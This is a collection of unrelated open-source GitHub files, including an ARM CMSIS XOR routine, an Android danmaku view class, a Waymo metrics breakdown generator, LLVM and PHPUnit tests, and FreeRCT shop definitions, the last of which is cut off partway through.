bool hasVideoSource() { return m_SourceCapabilities->hasVideoSource(); }
protected:
explicit MediaStreamCapabilities(PassRefPtr<MediaStreamSourceCapabilities>);
RefPtr<MediaStreamSourceCapabilities> m_SourceCapabilities;
};
} // namespace WebCore
#endif // MediaStreamCapabilities_h
#endif
| {
"pile_set_name": "Github"
} |
/* ----------------------------------------------------------------------
* Project: CMSIS DSP Library
* Title: arm_xor_u8.c
* Description: uint8_t bitwise exclusive OR
*
* $Date: 14 November 2019
* $Revision: V1.6.0
*
* Target Processor: Cortex-M cores
* -------------------------------------------------------------------- */
/*
* Copyright (C) 2010-2019 ARM Limited or its affiliates. All rights reserved.
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the License); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "dsp/basic_math_functions.h"
/**
@ingroup groupMath
*/
/**
@addtogroup Xor
@{
*/
/**
@brief Compute the logical bitwise XOR of two fixed-point vectors.
@param[in] pSrcA points to input vector A
@param[in] pSrcB points to input vector B
@param[out] pDst points to output vector
@param[in] blockSize number of samples in each vector
@return none
*/
void arm_xor_u8(
const uint8_t * pSrcA,
const uint8_t * pSrcB,
uint8_t * pDst,
uint32_t blockSize)
{
uint32_t blkCnt; /* Loop counter */
#if defined(ARM_MATH_MVEI) && !defined(ARM_MATH_AUTOVECTORIZE)
q7x16_t vecSrcA, vecSrcB;
/* Compute 16 outputs at a time */
blkCnt = blockSize >> 4;
while (blkCnt > 0U)
{
vecSrcA = vld1q(pSrcA);
vecSrcB = vld1q(pSrcB);
vst1q(pDst, veorq_u8(vecSrcA, vecSrcB) );
pSrcA += 16;
pSrcB += 16;
pDst += 16;
/* Decrement the loop counter */
blkCnt--;
}
/* Tail */
blkCnt = blockSize & 0xF;
if (blkCnt > 0U)
{
mve_pred16_t p0 = vctp8q(blkCnt);
vecSrcA = vld1q(pSrcA);
vecSrcB = vld1q(pSrcB);
vstrbq_p(pDst, veorq_u8(vecSrcA, vecSrcB), p0);
}
#else
#if defined(ARM_MATH_NEON) && !defined(ARM_MATH_AUTOVECTORIZE)
uint8x16_t vecA, vecB;
/* Compute 16 outputs at a time */
blkCnt = blockSize >> 4U;
while (blkCnt > 0U)
{
vecA = vld1q_u8(pSrcA);
vecB = vld1q_u8(pSrcB);
vst1q_u8(pDst, veorq_u8(vecA, vecB) );
pSrcA += 16;
pSrcB += 16;
pDst += 16;
/* Decrement the loop counter */
blkCnt--;
}
/* Tail */
blkCnt = blockSize & 0xF;
#else
/* Initialize blkCnt with number of samples */
blkCnt = blockSize;
#endif
while (blkCnt > 0U)
{
*pDst++ = (*pSrcA++)^(*pSrcB++);
/* Decrement the loop counter */
blkCnt--;
}
#endif /* if defined(ARM_MATH_MVEI) */
}
/**
@} end of Xor group
*/
| {
"pile_set_name": "Github"
} |
<Materials>
<Macros NG=" 2 ">
<material ID=" 1 " NA=" 0 " fissile="true">
<name>Assembly type 1</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.748301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="2" NA="0" fissile="true">
<name>Assembly type 2</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.753301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="3" NA="0" fissile="true">
<name>Assembly type 3</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.703301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="4" NA="0" fissile="false">
<name>Reflector</name>
<TotalXS>0.16666666666666666666666666666667 1.1111111111111111111111111111111</TotalXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.126506666666667
0.040 1.101087111111111
</ScatteringXS>
<DiffusionCoefficient>2.0 0.3</DiffusionCoefficient>
</material>
</Macros>
</Materials>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 Chen Hui <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package master.flame.danmaku.ui.widget;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Canvas;
import android.graphics.Color;
import android.os.Build;
import android.os.Handler;
import android.os.HandlerThread;
import android.os.Looper;
import android.util.AttributeSet;
import android.view.MotionEvent;
import android.view.View;
import java.util.LinkedList;
import java.util.Locale;
import master.flame.danmaku.controller.DrawHandler;
import master.flame.danmaku.controller.DrawHandler.Callback;
import master.flame.danmaku.controller.DrawHelper;
import master.flame.danmaku.controller.IDanmakuView;
import master.flame.danmaku.controller.IDanmakuViewController;
import master.flame.danmaku.danmaku.model.BaseDanmaku;
import master.flame.danmaku.danmaku.model.IDanmakus;
import master.flame.danmaku.danmaku.model.android.DanmakuContext;
import master.flame.danmaku.danmaku.parser.BaseDanmakuParser;
import master.flame.danmaku.danmaku.renderer.IRenderer.RenderingState;
import master.flame.danmaku.danmaku.util.SystemClock;
public class DanmakuView extends View implements IDanmakuView, IDanmakuViewController {
public static final String TAG = "DanmakuView";
private Callback mCallback;
private HandlerThread mHandlerThread;
protected volatile DrawHandler handler;
private boolean isSurfaceCreated;
private boolean mEnableDanmakuDrwaingCache = true;
private OnDanmakuClickListener mOnDanmakuClickListener;
private float mXOff;
private float mYOff;
private OnClickListener mOnClickListener;
private DanmakuTouchHelper mTouchHelper;
private boolean mShowFps;
private boolean mDanmakuVisible = true;
protected int mDrawingThreadType = THREAD_TYPE_NORMAL_PRIORITY;
private Object mDrawMonitor = new Object();
private boolean mDrawFinished = false;
protected boolean mRequestRender = false;
private long mUiThreadId;
public DanmakuView(Context context) {
super(context);
init();
}
private void init() {
mUiThreadId = Thread.currentThread().getId();
setBackgroundColor(Color.TRANSPARENT);
setDrawingCacheBackgroundColor(Color.TRANSPARENT);
DrawHelper.useDrawColorToClearCanvas(true, false);
mTouchHelper = DanmakuTouchHelper.instance(this);
}
public DanmakuView(Context context, AttributeSet attrs) {
super(context, attrs);
init();
}
public DanmakuView(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
init();
}
public void addDanmaku(BaseDanmaku item) {
if (handler != null) {
handler.addDanmaku(item);
}
}
@Override
public void invalidateDanmaku(BaseDanmaku item, boolean remeasure) {
if (handler != null) {
handler.invalidateDanmaku(item, remeasure);
}
}
@Override
public void removeAllDanmakus(boolean isClearDanmakusOnScreen) {
if (handler != null) {
handler.removeAllDanmakus(isClearDanmakusOnScreen);
}
}
@Override
public void removeAllLiveDanmakus() {
if (handler != null) {
handler.removeAllLiveDanmakus();
}
}
@Override
public IDanmakus getCurrentVisibleDanmakus() {
if (handler != null) {
return handler.getCurrentVisibleDanmakus();
}
return null;
}
public void setCallback(Callback callback) {
mCallback = callback;
if (handler != null) {
handler.setCallback(callback);
}
}
@Override
public void release() {
stop();
if(mDrawTimes!= null) mDrawTimes.clear();
}
@Override
public void stop() {
stopDraw();
}
private synchronized void stopDraw() {
if (this.handler == null) {
return;
}
DrawHandler handler = this.handler;
this.handler = null;
unlockCanvasAndPost();
if (handler != null) {
handler.quit();
}
HandlerThread handlerThread = this.mHandlerThread;
mHandlerThread = null;
if (handlerThread != null) {
try {
handlerThread.join();
} catch (InterruptedException e) {
e.printStackTrace();
}
handlerThread.quit();
}
}
protected synchronized Looper getLooper(int type) {
if (mHandlerThread != null) {
mHandlerThread.quit();
mHandlerThread = null;
}
int priority;
switch (type) {
case THREAD_TYPE_MAIN_THREAD:
return Looper.getMainLooper();
case THREAD_TYPE_HIGH_PRIORITY:
priority = android.os.Process.THREAD_PRIORITY_URGENT_DISPLAY;
break;
case THREAD_TYPE_LOW_PRIORITY:
priority = android.os.Process.THREAD_PRIORITY_LOWEST;
break;
case THREAD_TYPE_NORMAL_PRIORITY:
default:
priority = android.os.Process.THREAD_PRIORITY_DEFAULT;
break;
}
String threadName = "DFM Handler Thread #" + priority;
mHandlerThread = new HandlerThread(threadName, priority);
mHandlerThread.start();
return mHandlerThread.getLooper();
}
private void prepare() {
if (handler == null)
handler = new DrawHandler(getLooper(mDrawingThreadType), this, mDanmakuVisible);
}
@Override
public void prepare(BaseDanmakuParser parser, DanmakuContext config) {
prepare();
handler.setConfig(config);
handler.setParser(parser);
handler.setCallback(mCallback);
handler.prepare();
}
@Override
public boolean isPrepared() {
return handler != null && handler.isPrepared();
}
@Override
public DanmakuContext getConfig() {
if (handler == null) {
return null;
}
return handler.getConfig();
}
@Override
public void showFPS(boolean show){
mShowFps = show;
}
private static final int MAX_RECORD_SIZE = 50;
private static final int ONE_SECOND = 1000;
private LinkedList<Long> mDrawTimes;
protected boolean mClearFlag;
private float fps() {
long lastTime = SystemClock.uptimeMillis();
mDrawTimes.addLast(lastTime);
Long first = mDrawTimes.peekFirst();
if (first == null) {
return 0.0f;
}
float dtime = lastTime - first;
int frames = mDrawTimes.size();
if (frames > MAX_RECORD_SIZE) {
mDrawTimes.removeFirst();
}
return dtime > 0 ? mDrawTimes.size() * ONE_SECOND / dtime : 0.0f;
}
@Override
public long drawDanmakus() {
if (!isSurfaceCreated)
return 0;
if (!isShown())
return -1;
long stime = SystemClock.uptimeMillis();
lockCanvas();
return SystemClock.uptimeMillis() - stime;
}
@SuppressLint("NewApi")
private void postInvalidateCompat() {
mRequestRender = true;
if(Build.VERSION.SDK_INT >= 16) {
this.postInvalidateOnAnimation();
} else {
this.postInvalidate();
}
}
protected void lockCanvas() {
if(mDanmakuVisible == false) {
return;
}
postInvalidateCompat();
synchronized (mDrawMonitor) {
while ((!mDrawFinished) && (handler != null)) {
try {
mDrawMonitor.wait(200);
} catch (InterruptedException e) {
if (mDanmakuVisible == false || handler == null || handler.isStop()) {
break;
} else {
Thread.currentThread().interrupt();
}
}
}
mDrawFinished = false;
}
}
private void lockCanvasAndClear() {
mClearFlag = true;
lockCanvas();
}
private void unlockCanvasAndPost() {
synchronized (mDrawMonitor) {
mDrawFinished = true;
mDrawMonitor.notifyAll();
}
}
@Override
protected void onDraw(Canvas canvas) {
if ((!mDanmakuVisible) && (!mRequestRender)) {
super.onDraw(canvas);
return;
}
if (mClearFlag) {
DrawHelper.clearCanvas(canvas);
mClearFlag = false;
} else {
if (handler != null) {
RenderingState rs = handler.draw(canvas);
if (mShowFps) {
if (mDrawTimes == null)
mDrawTimes = new LinkedList<Long>();
String fps = String.format(Locale.getDefault(),
"fps %.2f,time:%d s,cache:%d,miss:%d", fps(), getCurrentTime() / 1000,
rs.cacheHitCount, rs.cacheMissCount);
DrawHelper.drawFPS(canvas, fps);
}
}
}
mRequestRender = false;
unlockCanvasAndPost();
}
@Override
protected void onLayout(boolean changed, int left, int top, int right, int bottom) {
super.onLayout(changed, left, top, right, bottom);
if (handler != null) {
handler.notifyDispSizeChanged(right - left, bottom - top);
}
isSurfaceCreated = true;
}
public void toggle() {
if (isSurfaceCreated) {
if (handler == null)
start();
else if (handler.isStop()) {
resume();
} else
pause();
}
}
@Override
public void pause() {
if (handler != null) {
handler.removeCallbacks(mResumeRunnable);
handler.pause();
}
}
private int mResumeTryCount = 0;
private Runnable mResumeRunnable = new Runnable() {
@Override
public void run() {
DrawHandler drawHandler = handler;
if (drawHandler == null) {
return;
}
mResumeTryCount++;
if (mResumeTryCount > 4 || DanmakuView.super.isShown()) {
drawHandler.resume();
} else {
drawHandler.postDelayed(this, 100 * mResumeTryCount);
}
}
};
@Override
public void resume() {
if (handler != null && handler.isPrepared()) {
mResumeTryCount = 0;
handler.post(mResumeRunnable);
} else if (handler == null) {
restart();
}
}
@Override
public boolean isPaused() {
if(handler != null) {
return handler.isStop();
}
return false;
}
public void restart() {
stop();
start();
}
@Override
public void start() {
start(0);
}
@Override
public void start(long position) {
Handler handler = this.handler;
if (handler == null) {
prepare();
handler = this.handler;
} else {
handler.removeCallbacksAndMessages(null);
}
if (handler != null) {
handler.obtainMessage(DrawHandler.START, position).sendToTarget();
}
}
@Override
public boolean onTouchEvent(MotionEvent event) {
boolean isEventConsumed = mTouchHelper.onTouchEvent(event);
if (!isEventConsumed) {
return super.onTouchEvent(event);
}
return isEventConsumed;
}
public void seekTo(Long ms) {
if(handler != null){
handler.seekTo(ms);
}
}
public void enableDanmakuDrawingCache(boolean enable) {
mEnableDanmakuDrwaingCache = enable;
}
@Override
public boolean isDanmakuDrawingCacheEnabled() {
return mEnableDanmakuDrwaingCache;
}
@Override
public boolean isViewReady() {
return isSurfaceCreated;
}
@Override
public int getViewWidth() {
return super.getWidth();
}
@Override
public int getViewHeight() {
return super.getHeight();
}
@Override
public View getView() {
return this;
}
@Override
public void show() {
showAndResumeDrawTask(null);
}
@Override
public void showAndResumeDrawTask(Long position) {
mDanmakuVisible = true;
mClearFlag = false;
if (handler == null) {
return;
}
handler.showDanmakus(position);
}
@Override
public void hide() {
mDanmakuVisible = false;
if (handler == null) {
return;
}
handler.hideDanmakus(false);
}
@Override
public long hideAndPauseDrawTask() {
mDanmakuVisible = false;
if (handler == null) {
return 0;
}
return handler.hideDanmakus(true);
}
@Override
public void clear() {
if (!isViewReady()) {
return;
}
if (!mDanmakuVisible || Thread.currentThread().getId() == mUiThreadId) {
mClearFlag = true;
postInvalidateCompat();
} else {
lockCanvasAndClear();
}
}
@Override
public boolean isShown() {
return mDanmakuVisible && super.isShown();
}
@Override
public void setDrawingThreadType(int type) {
mDrawingThreadType = type;
}
@Override
public long getCurrentTime() {
if (handler != null) {
return handler.getCurrentTime();
}
return 0;
}
@Override
@SuppressLint("NewApi")
public boolean isHardwareAccelerated() {
// >= 3.0
if (Build.VERSION.SDK_INT >= 11) {
return super.isHardwareAccelerated();
} else {
return false;
}
}
@Override
public void clearDanmakusOnScreen() {
if (handler != null) {
handler.clearDanmakusOnScreen();
}
}
@Override
public void setOnDanmakuClickListener(OnDanmakuClickListener listener) {
mOnDanmakuClickListener = listener;
}
@Override
public void setOnDanmakuClickListener(OnDanmakuClickListener listener, float xOff, float yOff) {
mOnDanmakuClickListener = listener;
mXOff = xOff;
mYOff = yOff;
}
@Override
public OnDanmakuClickListener getOnDanmakuClickListener() {
return mOnDanmakuClickListener;
}
@Override
public float getXOff() {
return mXOff;
}
@Override
public float getYOff() {
return mYOff;
}
public void forceRender() {
mRequestRender = true;
handler.forceRender();
}
}
| {
"pile_set_name": "Github"
} |
--TEST--
phpunit -c ../_files/configuration.custom-printer.xml --verbose IncompleteTest ../_files/IncompleteTest.php
--FILE--
<?php
$_SERVER['argv'][1] = '-c';
$_SERVER['argv'][2] = dirname(__FILE__) . '/../_files/configuration.custom-printer.xml';
$_SERVER['argv'][3] = '--verbose';
$_SERVER['argv'][4] = 'IncompleteTest';
$_SERVER['argv'][5] = dirname(__FILE__) . '/../_files/IncompleteTest.php';
require __DIR__ . '/../bootstrap.php';
PHPUnit_TextUI_Command::main();
?>
--EXPECTF--
PHPUnit %s by Sebastian Bergmann and contributors.
Runtime: %s
Configuration: %sconfiguration.custom-printer.xml
I
Time: %s, Memory: %s
There was 1 incomplete test:
1) IncompleteTest::testIncomplete
Test incomplete
%s
OK, but incomplete, skipped, or risky tests!
Tests: 1, Assertions: 0, Incomplete: 1.
| {
"pile_set_name": "Github"
} |
<mat-toolbar color="primary">
<button mat-button class="sidenav-toggle" (click)="toggleSidenav.emit()">
<mat-icon aria-label="Drawer Menu" svgIcon="baseline-menu"></mat-icon>
</button>
<span>A .NET Core Blog</span>
<span class="toolbar-spacer"></span>
<button mat-button [matMenuTriggerFor]="menu">
<mat-icon svgIcon="baseline-more_vert"></mat-icon>
</button>
<mat-menu #menu="matMenu">
<button mat-menu-item>Sign In</button>
<button mat-menu-item>Sign out</button>
</mat-menu>
</mat-toolbar>
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: This file is auto generated by the elixir code generator program.
# Do not edit this file manually.
defmodule GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
@moduledoc """
Template for a collection of DataTransfer resources. STEPLADDER: Generated unstable field number for field 'kind'. (See http://go/stepladder-help#fieldNumber) STEPLADDER: Generated unstable field number for field 'etag'. (See http://go/stepladder-help#fieldNumber)
## Attributes
* `dataTransfers` (*type:* `list(GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer.t)`, *default:* `nil`) - List of data transfer requests.
* `etag` (*type:* `String.t`, *default:* `nil`) - ETag of the resource.
* `kind` (*type:* `String.t`, *default:* `admin#datatransfer#dataTransfersList`) - Identifies the resource as a collection of data transfer requests.
* `nextPageToken` (*type:* `String.t`, *default:* `nil`) - Continuation token which will be used to specify next page in list API.
"""
use GoogleApi.Gax.ModelBase
@type t :: %__MODULE__{
:dataTransfers => list(GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer.t()),
:etag => String.t(),
:kind => String.t(),
:nextPageToken => String.t()
}
field(:dataTransfers, as: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer, type: :list)
field(:etag)
field(:kind)
field(:nextPageToken)
end
defimpl Poison.Decoder, for: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
def decode(value, options) do
GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse.decode(value, options)
end
end
defimpl Poison.Encoder, for: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
def encode(value, options) do
GoogleApi.Gax.ModelBase.encode(value, options)
end
end
| {
"pile_set_name": "Github"
} |
; RUN: opt < %s -S -passes=ipsccp | FileCheck %s
; RUN: opt < %s -S -ipsccp | FileCheck %s
@_ZL6test1g = internal global i32 42, align 4
define void @_Z7test1f1v() nounwind {
entry:
%tmp = load i32, i32* @_ZL6test1g, align 4
%cmp = icmp eq i32 %tmp, 0
br i1 %cmp, label %if.then, label %if.end
if.then: ; preds = %entry
store i32 0, i32* @_ZL6test1g, align 4
br label %if.end
if.end: ; preds = %if.then, %entry
ret void
}
; CHECK: @_Z7test1f2v()
; CHECK: entry:
; CHECK-NEXT: ret i32 42
define i32 @_Z7test1f2v() nounwind {
entry:
%tmp = load i32, i32* @_ZL6test1g, align 4
ret i32 %tmp
}
| {
"pile_set_name": "Github"
} |
/* Copyright 2019 The Waymo Open Dataset Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include "waymo_open_dataset/metrics/breakdown_generator.h"
#include <math.h>
#include <glog/logging.h>
#include "absl/memory/memory.h"
#include "absl/strings/str_cat.h"
#include "waymo_open_dataset/label.pb.h"
#include "waymo_open_dataset/protos/breakdown.pb.h"
#include "waymo_open_dataset/protos/metrics.pb.h"
namespace waymo {
namespace open_dataset {
namespace {
double Hypot3(double a, double b, double c) {
return std::sqrt(a * a + b * b + c * c);
}
} // namespace
// This breakdown generator considers everything as one shard.
class BreakdownGeneratorOneShard : public BreakdownGenerator {
public:
~BreakdownGeneratorOneShard() override {}
int Shard(const Object& object) const override { return 0; }
Breakdown::GeneratorId Id() const override { return Breakdown::ONE_SHARD; }
int NumShards() const override { return 1; }
std::string ShardName(int shard) const override { return "ONE_SHARD"; }
};
// This breakdown generator considers everything as one shard.
class BreakdownGeneratorAllButSign : public BreakdownGenerator {
public:
~BreakdownGeneratorAllButSign() override {}
int Shard(const Object& object) const override {
if (object.object().type() != Label::TYPE_SIGN) {
return 0;
}
return 1;
}
Breakdown::GeneratorId Id() const override { return Breakdown::ALL_BUT_SIGN; }
int NumShards() const override { return 2; }
std::string ShardName(int shard) const override { return "ALL_BUT_SIGN"; }
};
// This breakdown generator breaks down the objects based on its object type.
class BreakdownGeneratorObjectType : public BreakdownGenerator {
public:
~BreakdownGeneratorObjectType() override {}
int Shard(const Object& object) const override {
// This returns -1 for TYPE_UNKNOWN. -1 indicates that TYPE_UNKNOWN is not
// in any shard.
return static_cast<int>(object.object().type() - 1);
}
Breakdown::GeneratorId Id() const override { return Breakdown::OBJECT_TYPE; }
int NumShards() const override { return static_cast<int>(Label::Type_MAX); }
std::string ShardName(int shard) const override {
return absl::StrCat(Breakdown::GeneratorId_Name(Id()), "_",
Label::Type_Name(static_cast<Label::Type>(shard + 1)));
}
};
// This breakdown generator breaks down the objects based on their center
// distance (w.r.t. SDC if the box is in vehicle frame).
class BreakdownGeneratorRange : public BreakdownGenerator {
public:
~BreakdownGeneratorRange() override {}
int Shard(const Object& object) const override {
double range = Hypot3(object.object().box().center_x(),
object.object().box().center_y(),
object.object().box().center_z());
constexpr float kNearRange = 30.0;
constexpr float kMidRange = 50.0;
const int shard_offset = 3 * (object.object().type() - 1);
if (shard_offset < 0) {
return -1;
}
if (range < kNearRange) {
return 0 + shard_offset;
} else if (range < kMidRange) {
return 1 + shard_offset;
} else {
return 2 + shard_offset;
}
}
Breakdown::GeneratorId Id() const override { return Breakdown::RANGE; }
int NumShards() const override {
return 3 * static_cast<int>(Label::Type_MAX);
}
std::string ShardName(int shard) const override {
const Label::Type object_type = static_cast<Label::Type>(shard / 3 + 1);
CHECK_LE(object_type, Label::Type_MAX) << shard;
CHECK_GE(object_type, 1) << shard;
const std::string prefix = absl::StrCat(Breakdown::GeneratorId_Name(Id()),
"_", Label::Type_Name(object_type));
const int range_shard = shard % 3;
switch (range_shard) {
case 0:
return absl::StrCat(prefix, "_", "[0, 30)");
case 1:
return absl::StrCat(prefix, "_", "[30, 50)");
case 2:
return absl::StrCat(prefix, "_", "[50, +inf)");
default:
LOG(FATAL) << "Code should not reach here.";
}
}
};
// This generator breaks down the results based on the magnitude of
// the velocity vector.
class BreakdownGeneratorVelocity : public BreakdownGenerator {
public:
~BreakdownGeneratorVelocity() override {}
int Shard(const Object& object) const override {
double v_x, v_y;
if (object.object().metadata().has_speed_x() &&
object.object().metadata().has_speed_y()) {
v_x = object.object().metadata().speed_x();
v_y = object.object().metadata().speed_y();
} else {
LOG(WARNING) << "Object does not have speed: " << object.DebugString();
v_x = 0;
v_y = 0;
}
// In meters per second in world coordinates.
const double v_mag = sqrt(v_x * v_x + v_y * v_y);
constexpr float kStationary = 0.2;
constexpr float kSlow = 1.;
constexpr float kMedium = 3.;
constexpr float kFast = 10.;
const int shard_offset = 5 * (object.object().type() - 1);
if (v_mag < kStationary) {
return 0 + shard_offset; // Stationary
} else if (v_mag < kSlow) {
return 1 + shard_offset; // Slow
} else if (v_mag < kMedium) {
return 2 + shard_offset; // Medium
} else if (v_mag < kFast) {
return 3 + shard_offset; // Fast
} else {
return 4 + shard_offset; // Very fast
}
}
std::vector<int> ShardsForMatching(const Object& object) const override {
std::vector<int> shards(5);
for (int i = 0; i < 5; ++i) {
shards[i] = 5 * (object.object().type() - 1) + i;
}
return shards;
}
int NumShards() const override {
return 5 * static_cast<int>(Label::Type_MAX);
}
Breakdown::GeneratorId Id() const override { return Breakdown::VELOCITY; }
std::string ShardName(int shard) const override {
const Label::Type object_type = static_cast<Label::Type>(shard / 5 + 1);
CHECK_LE(object_type, Label::Type_MAX) << shard;
CHECK_GE(object_type, 1) << shard;
const std::string prefix = absl::StrCat(Breakdown::GeneratorId_Name(Id()),
"_", Label::Type_Name(object_type));
const int velocity_shard = shard % 5;
switch (velocity_shard) {
case 0:
return absl::StrCat(prefix, "_", "STATIONARY");
case 1:
return absl::StrCat(prefix, "_", "SLOW");
case 2:
return absl::StrCat(prefix, "_", "MEDIUM");
case 3:
return absl::StrCat(prefix, "_", "FAST");
case 4:
return absl::StrCat(prefix, "_", "VERY_FAST");
default:
LOG(FATAL) << "Code should not reach here.";
}
}
bool IsGroundTruthOnlyBreakdown() const { return true; }
};
std::unique_ptr<BreakdownGenerator> BreakdownGenerator::Create(
Breakdown::GeneratorId id) {
switch (id) {
case Breakdown::OBJECT_TYPE:
return absl::make_unique<BreakdownGeneratorObjectType>();
case Breakdown::ONE_SHARD:
return absl::make_unique<BreakdownGeneratorOneShard>();
case Breakdown::RANGE:
return absl::make_unique<BreakdownGeneratorRange>();
case Breakdown::VELOCITY:
return absl::make_unique<BreakdownGeneratorVelocity>();
case Breakdown::ALL_BUT_SIGN:
return absl::make_unique<BreakdownGeneratorAllButSign>();
default:
LOG(FATAL) << "Unimplemented breakdown generator "
<< Breakdown::GeneratorId_Name(id);
}
}
} // namespace open_dataset
} // namespace waymo
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright (c) 2015-present, Facebook, Inc. All rights reserved.
*
* You are hereby granted a non-exclusive, worldwide, royalty-free license to
* use, copy, modify, and distribute this software in source code or binary
* form for use in connection with the web services and APIs provided by
* Facebook.
*
* As with any software that integrates with the Facebook platform, your use
* of this software is subject to the Facebook Developer Principles and
* Policies [http://developers.facebook.com/policy/]. This copyright notice
* shall be included in all copies or substantial portions of the software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*/
require __DIR__ . '/vendor/autoload.php';
use FacebookAds\Object\Page;
use FacebookAds\Object\PagePost;
use FacebookAds\Api;
use FacebookAds\Logger\CurlLogger;
$access_token = '<ACCESS_TOKEN>';
$app_secret = '<APP_SECRET>';
$app_id = '<APP_ID>';
$id = '<ID>';
$api = Api::init($app_id, $app_secret, $access_token);
$api->setLogger(new CurlLogger());
$fields = array(
);
$params = array(
);
echo json_encode((new Page($id))->getPosts(
$fields,
$params
)->getResponse()->getContent(), JSON_PRETTY_PRINT); | {
"pile_set_name": "Github"
} |
// This file is part of FreeRCT.
// FreeRCT is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, version 2.
// FreeRCT is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
// See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with FreeRCT. If not, see <http://www.gnu.org/licenses/>.
//
file("shops.rcd") {
INFO {
name: "Baseset shop rides";
uri: "org.freerct/baseset/shops/2";
description: "FreeRCT baseset shops.";
}
// Snack shop.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 0; y_base: 0;
file: "../sprites/objects/1x1/template/64_0000{seq(1..4, 1)}.png";
x_offset: -32; y_offset: -33; width: 64; height: 64;
}
flags: bitset(ne_entrance);
cost_item1: 50;
cost_item2: 150;
cost_ownership: 0;
cost_opened: 500;
type_item1: non_salt_food;
type_item2: salt_food;
texts: strings { key: "snack-shop"; }
}
// Ice cream stall.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 0; y_base: 0;
file: "../sprites/ride_shops/ice_cream_stall/64_000{seq(1..4,1)}.png";
recolour: "../sprites/ride_shops/ice_cream_stall/64p_000{seq(1..4,1)}.png";
x_offset: -32; y_offset: -97; width: 64; height: 128;
}
recolour {
original: grey;
replace: bitset(pink, orange, green_brown, orange_brown, yellow, light_green, green,
pink_brown, blue, jade_green, purple, red, sea_green);
}
recolour {
original: grey;
replace: bitset(yellow, jade_green, purple, green);
}
flags: bitset(ne_entrance);
cost_item1: 500;
cost_item2: 350;
cost_ownership: 0;
cost_opened: 500;
type_item1: ice_cream;
type_item2: drink;
texts: strings { key: "ice-cream-stall"; }
}
// Toilet.
SHOP {
tile_width: 64;
height: 1;
(se, sw, nw, ne): spritefiles {
x_base: 1; y_base: 0;
file: "../sprites/ride_shops/toilet/64_000{seq(1..4,1)}.png";
